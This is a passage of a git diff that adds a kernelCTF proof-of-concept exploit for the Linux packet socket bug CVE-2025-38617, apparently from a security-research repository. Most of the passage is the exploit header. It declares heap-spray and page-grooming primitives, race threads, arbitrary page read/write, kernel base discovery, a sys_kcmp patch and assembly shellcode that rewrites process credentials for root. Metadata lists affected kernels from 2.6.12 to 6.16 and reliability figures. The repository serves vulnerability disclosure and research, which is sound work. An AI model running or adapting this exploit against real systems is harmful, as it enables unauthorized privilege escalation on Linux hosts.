0x%016lx\n", rb_node->__rb_parent_color); + printf("rb_left: 0x%016lx\n", (u64)rb_node->rb_left); + printf("rb_right: 0x%016lx\n", (u64)(rb_node->rb_right)); + printf("name: 0x%016lx\n", (u64)(simple_xattr->name)); + printf("value_size: 0x%016lx\n", (u64)(simple_xattr->size)); + printf("value: %s\n", (char *)(simple_xattr->value)); +} + +struct pipe_buffer { + void *page; + unsigned int offset, len; + void *ops; + unsigned int flags; + unsigned long private; +}; + +static_assert(sizeof(struct pipe_buffer) == 40, "sizeof(struct pipe_buffer) not match with kernel"); + +static inline bool is_data_look_like_pipe_buffer(struct pipe_buffer *pipe_buffer) +{ + if ( + (((u64)(pipe_buffer->page) >> 48) == 0xFFFF) && + (((u64)(pipe_buffer->ops) & 0xFFFFFF) == anon_pipe_buf_ops_last_24_bits) + ) + return true; + + return false; +} + +static inline void pipe_buffer_dump(struct pipe_buffer *pipe_buffer) +{ + printf("====== pipe_buffer_dump ======\n"); + printf("page: 0x%016lx\n", (u64)(pipe_buffer->page)); + printf("offset: %u, len: %u\n", pipe_buffer->offset, pipe_buffer->len); + printf("ops: 0x%016lx\n", (u64)(pipe_buffer->ops)); + printf("flags: %u\n", pipe_buffer->flags); + printf("private: 0x%016lx\n", pipe_buffer->private); +} + +/* Error handling */ +void unix_error(const char *msg); +void Mnl_socket_error(const char *msg); +void Pthread_error(const char *msg, int error_code); +/* Error handling */ + +/* libc wrapper */ + +void Unshare(int flags); +int Socket(int domain, int type, int protocol); +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen); +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen); +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen); +void Ioctl(int fd, unsigned long request, unsigned long arg); +void Close(int fd); +int Dup(int fd); +void Pipe2(int pipefd[2], int flags); +int Fcntl(int fd, int op, unsigned long arg); +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset); +void Munmap(void *addr, size_t len); +FILE *Fopen(const char *filename, const char *modes); +void Fclose(FILE *stream); +void *Calloc(size_t nmemb, size_t size); +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags); +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg); +void Pthread_join(pthread_t thread, void **retval); +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset); +void Getrlimit(int resource, struct rlimit *rlim); +void Setrlimit(int resource, const struct rlimit *rlim); +void Setpriority(int which, id_t who, int value); +int Timerfd_create(int clockid, int flags); +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value); +int Epoll_create1(int flags); +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event); +unsigned int If_nametoindex(const char *ifname); +void Mkdir(const char *pathname, mode_t mode); +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data); +int Open(const char *pathname, int flags, mode_t mode); +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags); +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size); +void Removexattr(const char *path, const char *name); +char *Strdup(const char *s); +ssize_t Read(int fd, void *buf, size_t count); +ssize_t Write(int fd, const void *buf, size_t count); +/* libc wrapper */ + +/* libmnl wrapper */ +struct mnl_socket *Mnl_socket_open(int bus); +void Mnl_socket_close(struct mnl_socket *nl); +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid); +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size); +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size); +/* libmnl wrapper */ + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq); +void dummy_network_interface_create(const char *ifname, u32 mtu); +void network_interface_up(int configure_socket_fd, const char *ifname); +void network_interface_down(int configure_socket_fd, const char *ifname); +void pin_thread_on_cpu(int cpu); +void setup_namespace(void); +void setup_tmpfs(void); +void setup_nofile_rlimit(void); +void create_file(const char *path); +bool thread_in_sleep_state(int tid); +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size); +void free_pages(int packet_socket); + +struct victim_packet_socket_config { + struct __kernel_sock_timeval sndtimeo; + struct sockaddr_ll addr; + struct tpacket_req3 tx_ring; + struct tpacket_req3 rx_ring; + int packet_loss; + int packet_version; + unsigned packet_reserve; + struct sock_filter filter[MAX_FILTER_LEN]; +}; + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +); + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config); + +struct victim_packet_socket { + struct victim_packet_socket_config *config; + int fd; +}; + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config); +void victim_packet_socket_destroy(struct victim_packet_socket *v); +void victim_packet_socket_configure(struct victim_packet_socket *v); + +struct simple_xattr_request { + char filepath[PATH_MAX]; + char name[XATTR_NAME_MAX + 1]; + char *value; + size_t value_size; + bool allocated; +}; + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +); + +void simple_xattr_request_destroy(struct simple_xattr_request *request); + +struct timerfd_waitlist_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + int timerfd; + int *timerfds; + int total_timerfd; + struct epoll_event *epoll_events; +}; + +void *timerfd_waitlist_thread_fn(void *arg); +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t); +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t); +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd); +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t); + +struct pg_vec_lock_thread_work { + struct victim_packet_socket *victim_packet_socket; + int ifindex; +}; + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex); +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w); + +struct pg_vec_lock_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + atomic_int tid; + int packet_socket; + int ifindex; + struct pg_vec_lock_thread_work *work; +}; + +void *pg_vec_lock_thread_fn(void *arg); +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w); +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t); +void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t); +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void); +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t); + +struct pg_vec_buffer_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool unshare_complete; + bool quit; + atomic_int tid; + struct pg_vec_buffer_thread_work *work; +}; + +struct pg_vec_buffer_thread_work { + struct victim_packet_socket *victim_packet_socket; + bool exploit; + bool cleanup; +}; + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +); +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w); + +void *pg_vec_buffer_thread_fn(void *arg); +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w); +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t); +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t); +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void); +void pg_vec_buffer_thread_destroy(struct pg_vec_buffer_thread *t); + +struct tpacket_rcv_thread_work { + struct timespec pg_vec_lock_release_time; + struct timespec decrease_tpacket_rcv_thread_sleep_time; + struct msghdr *msg; +}; + +struct tpacket_rcv_thread_work *tpacket_rcv_thread_work_create( + struct timespec pg_vec_lock_release_time, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct msghdr *msg +); + +void tpacket_rcv_thread_work_destroy(struct tpacket_rcv_thread_work *w); + +struct tpacket_rcv_thread { + pthread_t handle; + pthread_mutex_t mutex; + pthread_cond_t cond; + bool ready_to_work; + bool work_complete; + bool quit; + struct tpacket_rcv_thread_work *work; +}; + +void *tpacket_rcv_thread_fn(void *arg); +void tpacket_rcv_thread_send_work(struct tpacket_rcv_thread *t, struct tpacket_rcv_thread_work *w); +void tpacket_rcv_thread_wait_work_complete(struct tpacket_rcv_thread *t); +void tpacket_rcv_thread_quit(struct tpacket_rcv_thread *t); +struct tpacket_rcv_thread *tpacket_rcv_thread_create(void); +void tpacket_rcv_thread_destroy(struct tpacket_rcv_thread *t); + +struct msghdr *msghdr_create( + void *data, + size_t datalen, + const char *devname +); + +void msghdr_destroy(struct msghdr *msghdr); + +static inline struct timespec timespec_sub(struct timespec t1, struct timespec t2) +{ + struct timespec diff = {}; + diff.tv_nsec = t1.tv_nsec - t2.tv_nsec; + diff.tv_sec = t1.tv_sec - t2.tv_sec; + + if (diff.tv_sec > 0 && diff.tv_nsec < 0) { + diff.tv_nsec += NSEC_PER_SEC; + diff.tv_sec--; + } else if (diff.tv_sec < 0 && diff.tv_nsec > 0) { + diff.tv_nsec -= NSEC_PER_SEC; + diff.tv_sec++; + } + + return diff; +} + +static inline struct timespec timespec_add(struct timespec t1, struct timespec t2) +{ + struct timespec sum = {}; + sum.tv_nsec = t1.tv_nsec + t2.tv_nsec; + sum.tv_sec = t1.tv_sec + t2.tv_sec; + + if (sum.tv_nsec >= NSEC_PER_SEC) { + sum.tv_sec++; + sum.tv_nsec -= NSEC_PER_SEC; + } + + return sum; +} + +static inline u64 timespec_div(struct timespec t1, struct timespec t2) +{ + u64 ns1 = t1.tv_sec * NSEC_PER_SEC + t1.tv_nsec; + u64 ns2 = t2.tv_sec * NSEC_PER_SEC + t2.tv_nsec; + return ns1 / ns2; +} + +static inline int timespec_cmp(struct timespec t1, struct timespec t2) +{ + if (t1.tv_sec < t2.tv_sec) + return -1; + + if (t1.tv_sec > t2.tv_sec) + return 1; + + if (t1.tv_nsec < t2.tv_nsec) + return -1; + + if (t1.tv_nsec > t2.tv_nsec) + return 1; + + return 0; +} + +static struct timespec null_timespec = { .tv_sec = 0, .tv_nsec = 0 }; + +struct necessary_threads { + struct timerfd_waitlist_thread **timerfd_waitlist_threads; + struct pg_vec_lock_thread *pg_vec_lock_thread; + struct pg_vec_buffer_thread *pg_vec_buffer_thread; + struct tpacket_rcv_thread *tpacket_rcv_thread; +}; + +struct necessary_threads *necessary_threads_create(int timerfd); +void necessary_threads_destroy(struct necessary_threads *nt); + +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH "/tmp/tmpfs/pages_order2_groom" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_NAME_FMT "security.pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT "pages_order2_groom_%d" +#define PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN "pages_order2_groom_" +#define TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY 2048 + +struct pages_order2_read_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + struct simple_xattr_request *simple_xattr_requests[TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY]; + struct simple_xattr_request *overflowed_simple_xattr_request; + struct simple_xattr_request *leaked_content_simple_xattr_request; + u64 overflowed_simple_xattr_kernel_address; + u64 leaked_content_simple_xattr_kernel_address; +}; + +void pages_order2_read_primitive_init(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_cleanup(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_page_drain_cleanup(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_setup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_cleanup_simple_xattr(struct pages_order2_read_primitive *primitive); +void pages_order2_read_primitive_main_work( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time +); + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +); + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive); +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive *pages_order2_read_primitive); + +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_NAME_FMT "security.leaked_pages_order3_addr_%d" +#define SIMPLE_XATTR_LEAKED_PAGES_ORDER3_ADDRESS_VALUE_FMT "leaked_pages_order3_addr_%d" + +#define TOTAL_PAGES_ORDER2_PG_VEC_SPRAY 256 + +struct simple_xattr_read_write_primitive { + struct victim_packet_socket_config *victim_packet_socket_config; + int drain_pages_order2_packet_socket; + int drain_pages_order3_packet_socket_1; + int drain_pages_order3_packet_socket_2; + int spray_pg_vec_packet_sockets[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int spray_pg_vec_packet_sockets_state[TOTAL_PAGES_ORDER2_PG_VEC_SPRAY]; + int overflowed_pg_vec_packet_socket; + struct simple_xattr_request *manipulated_simple_xattr_request; + void *mmap_address; +}; + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive); +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +); + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +); + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +); + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive); + +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr_name" +#define LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME "security.leak_pages_order2_for_fake_simple_xattr" + +#define FAKE_SIMPLE_XATTR_NAME "security.fake_simple_xattr_name" +#define DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION "security.detect_fake_simple_xattr_reclaimation" + +struct abr_page_read_write_primitive { + int packet_socket_with_overwritten_pg_vec; + int packet_socket_to_overwrite_pg_vec; + u64 overwrite_pg_vec_mmap_size; + u64 overwritten_pg_vec_mmap_size; + u64 original_buffer_page_addr; +}; + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_write_primitive +); + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +); + +void abr_page_read_write_primitive_munmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + void *mem +); + +#define LEAKED_PAGES_ORDER2_ADDRESS_FOR_PIPE_BUFFER_SIMPLE_XATTR_NAME "security.leaked_pages_order2_addr_for_pipe_buffer" + +u64 find_kernel_base( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive +); + +void *patch_sys_kcmp(struct abr_page_read_write_primitive *abr_page_read_write_primitive); + +extern void privilege_escalation_shellcode_begin(void); +extern void privilege_escalation_shellcode_end(void); + +__asm__( + ".intel_syntax noprefix;" + ".global privilege_escalation_shellcode_begin;" + ".global privilege_escalation_shellcode_end;" + + "privilege_escalation_shellcode_begin:\n" + + "mov rax,QWORD PTR gs:0x32380;" + "shl rdi, 32;" + "shl rsi, 32;" + "shr rsi, 32;" + "or rdi, rsi;" + "mov QWORD PTR [rax + 0x7c0], rdi;" + "mov QWORD PTR [rax + 0x7b8], rdi;" + "mov QWORD PTR [rax + 0x810], rcx;" + "jmp r8;" + + "privilege_escalation_shellcode_end:\n" + ".att_syntax;" +); + +#endif diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/metadata.json b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/metadata.json new file mode 100644 index 000000000..cf594d46d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/metadata.json @@ -0,0 +1,30 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp375", "exp396"], + "vulnerability": { + "cve": "CVE-2025-38617", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36", + "affected_versions": ["2.6.12 - 6.16"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_RAW"], + "kernel_config": [ + "CONFIG_PACKET" + ] + } + }, + "exploits": { + "mitigation-v4-6.6": { + "environment": "mitigation-v4-6.6", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes" : "60% - 90%. Fail mostly due to 60 seconds runtime pull request check" + }, + "cos-109-17800.519.41": { + "environment": "cos-109-17800.519.41", + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes" : "10% - 70%. Exploit is optimized for mitigation instance. Do not use this exploit strategy on normal instance" + } + } + } diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp375.tar.gz b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp375.tar.gz new file mode 100644 index 000000000..ff53a60c1 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp375.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp396.tar.gz b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp396.tar.gz new file mode 100644 index 000000000..6047da6a7 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/original_exp396.tar.gz differ